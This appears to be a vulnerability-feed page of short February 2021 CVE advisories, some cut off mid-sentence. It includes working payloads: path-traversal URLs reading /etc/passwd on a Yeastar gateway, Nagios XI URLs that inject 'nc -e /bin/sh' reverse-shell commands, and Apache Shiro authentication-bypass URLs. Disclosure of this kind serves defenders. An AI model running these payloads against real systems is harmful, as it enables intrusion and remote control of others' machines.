Recent Vulmon Research Posts

CVE-2021-21972
24-02-2021

VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

CVE-2021-27328
19-02-2021

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3 To get firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/paswd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

CVE-2021-25298
15-02-2021

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= Payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

CVE-2021-25297
15-02-2021

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_spee

CVE-2021-25296
15-02-2021

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2= payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

CVE-2021-27204
12-02-2021

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2021-27205
12-02-2021

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores the local copy of received message (audio/video) on a custom path even after those messages are deleted/disappeared from the secret chat. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html

CVE-2020-36079
11-02-2021

Authenticated arbitrary file upload to RCE Product : Zenphoto Affected : Zenphoto CMS - <= 1.5.7 Attack Type : Remote login then go to plugins then go to uploader and press on the check box elFinder then press apply , after that you go to upload then Files(elFinder) drag and drop any malicious php code after that go to /uploaded/ and you're php code -------------------------------------------------------------------------------------------- Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder)

CVE-2021-1732
10-02-2021

Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft IE browser or Adobe Reader on the lasted Windows 10 version. The quality of this vulnerability high and the exploit is sophisticated. The use of this in-the-wild zero-day reflects the organization’s strong vulnerability reserve capability. The threat organization may have recruited members with certain strength, or buying it from vulnerability brokers. The in-the-wild zero-day: 1. It

CVE-2020-17523
06-02-2021

Apache Shiro very easy to exploit authentication bypass vulnerability. Use blank characters such as spaces to bypass shiro authentication: http://127.0.0.1/admin/%20 or http://127.0.0.1/admin/%20/ https://github.com/jweny/shiro-cve-2020-17523